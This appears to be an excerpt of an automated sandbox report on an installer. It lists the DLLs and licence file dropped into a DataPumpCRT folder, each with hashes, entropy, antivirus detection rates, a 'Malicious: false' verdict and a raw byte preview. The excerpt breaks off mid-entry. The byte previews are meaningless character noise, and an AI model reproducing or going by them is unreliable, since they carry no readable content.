Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................\|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassalac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11532
Entropy (8bit):	7.219753259626605
Encrypted:	false
SSDEEP:	192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
MD5:	073F34B193F0831B3DD86313D74F1D2A
SHA1:	3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
SHA-256:	C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
SHA-512:	EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite.............................`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\...S...s..$..........o..y..........,.........-..X.....v.M1..'...5R.4..8k!..q.=BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z..).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassape.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39304
Entropy (8bit):	7.819409739152795
Encrypted:	false
SSDEEP:	768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
MD5:	C7A50ACE28DDE05B897E000FA398BBCE
SHA1:	33DA507B06614F890D8C8239E71D3D1372E61DAA
SHA-256:	F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
SHA-512:	4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.\|w.t...\..dkB%..i.cX...`B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....\|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..

C:\Program Files (x86)\DataPumpCRT\bin\x86\basscd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18966
Entropy (8bit):	7.620111275837424
Encrypted:	false
SSDEEP:	384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
MD5:	F0F973781B6A66ADF354B04A36C5E944
SHA1:	8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
SHA-256:	04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
SHA-512:	118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassdsd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8456
Entropy (8bit):	6.767152008521429
Encrypted:	false
SSDEEP:	192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
MD5:	19E08B7F7B379A9D1F370E2B5CC622BD
SHA1:	3E2D2767459A92B557380C5796190DB15EC8A6EA
SHA-256:	AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
SHA-512:	564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...\|.

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassflac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36752
Entropy (8bit):	7.780431937344781
Encrypted:	false
SSDEEP:	768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
MD5:	9FF783BB73F8868FA6599CDE65ED21D7
SHA1:	F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
SHA-256:	E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
SHA-512:	C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x\|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p.....X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..\|....J

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmidi.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36416
Entropy (8bit):	7.842278356440954
Encrypted:	false
SSDEEP:	768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
MD5:	BEBA64522AA8265751187E38D1FC0653
SHA1:	63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
SHA-256:	8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
SHA-512:	13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmix.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19008
Entropy (8bit):	7.672481244971812
Encrypted:	false
SSDEEP:	384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
MD5:	8EE91149989D50DFCF9DAD00DF87C9B0
SHA1:	E5581E6C1334A78E493539F8EA1CE585C9FFAF89
SHA-256:	3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
SHA-512:	FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...\|...}K...................E..K....p..j...g........Q..........y...........

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassopus.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68876
Entropy (8bit):	7.922125376804506
Encrypted:	false
SSDEEP:	1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
MD5:	4E35BA785CD3B37A3702E577510F39E3
SHA1:	A2FD74A68BEFF732E5F3CB0835713AEA8D639902
SHA-256:	0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
SHA-512:	1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c..=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..

C:\Program Files (x86)\DataPumpCRT\bin\x86\basswma.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17472
Entropy (8bit):	7.524548435291935
Encrypted:	false
SSDEEP:	384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
MD5:	7B52BE6D702AA590DB57A0E135F81C45
SHA1:	518FB84C77E547DD73C335D2090A35537111F837
SHA-256:	9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
SHA-512:	79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........\|...CC.......p......n....<.......`..............lH......)...............

C:\Program Files (x86)\DataPumpCRT\bin\x86\basswv.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35588
Entropy (8bit):	7.817557274117395
Encrypted:	false
SSDEEP:	768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
MD5:	58521D1AC2C588B85642354F6C0C7812
SHA1:	5912D2507F78C18D5DC567B2FA8D5AE305345972
SHA-256:	452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
SHA-512:	3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(

C:\Program Files (x86)\DataPumpCRT\bin\x86\copying (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1059
Entropy (8bit):	5.1208137218866945
Encrypted:	false
SSDEEP:	24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
MD5:	B7EDCC6CB01ACE25EBD2555CF15473DC
SHA1:	2627FF03833F74ED51A7F43C55D30B249B6A0707
SHA-256:	D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
SHA-512:	962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
Malicious:	false
Reputation:	unknown
Preview:	Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH

C:\Program Files (x86)\DataPumpCRT\bin\x86\d_writer.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	16910
Entropy (8bit):	5.289608933932413
Encrypted:	false
SSDEEP:	384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
MD5:	2F040608E68E679DD42B7D8D3FCA563E
SHA1:	4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
SHA-256:	6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
SHA-512:	718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......\|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..\|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\da.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.192037544202194
Encrypted:	false
SSDEEP:	384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
MD5:	BEFD36FE8383549246E1FD49DB270C07
SHA1:	1EF12B568599F31292879A8581F6CD0279F3E92A
SHA-256:	B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
SHA-512:	FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\daiso.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	197646
Entropy (8bit):	6.1570532273946625
Encrypted:	false
SSDEEP:	3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
MD5:	2C8EC61630F8AA6AAC674E4C63F4C973
SHA1:	64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
SHA-256:	DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
SHA-512:	488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	31936
Entropy (8bit):	6.6461204214578
Encrypted:	false
SSDEEP:	768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
MD5:	72E3BDD0CE0AF6A3A3C82F3AE6426814
SHA1:	A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
SHA-256:	7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
SHA-512:	A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2pcmt.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.423554884287906
Encrypted:	false
SSDEEP:	6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
MD5:	67247C0ACA089BDE943F802BFBA8752C
SHA1:	508DA6E0CF31A245D27772C70FFA9A2AE54930A3
SHA-256:	BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
SHA-512:	C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\dstt.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.401537154757194
Encrypted:	false
SSDEEP:	3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
MD5:	840D631DA54C308B23590AD6366EBA77
SHA1:	5ED0928667451239E62E6A0A744DA47C74E1CF89
SHA-256:	6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
SHA-512:	1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\ff_helper.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	62478
Entropy (8bit):	6.063363187934607
Encrypted:	false
SSDEEP:	768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
MD5:	940EEBDB301CB64C7EA2E7FA0646DAA3
SHA1:	0347F029DA33C30BBF3FB067A634B49E8C89FEC2
SHA-256:	B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
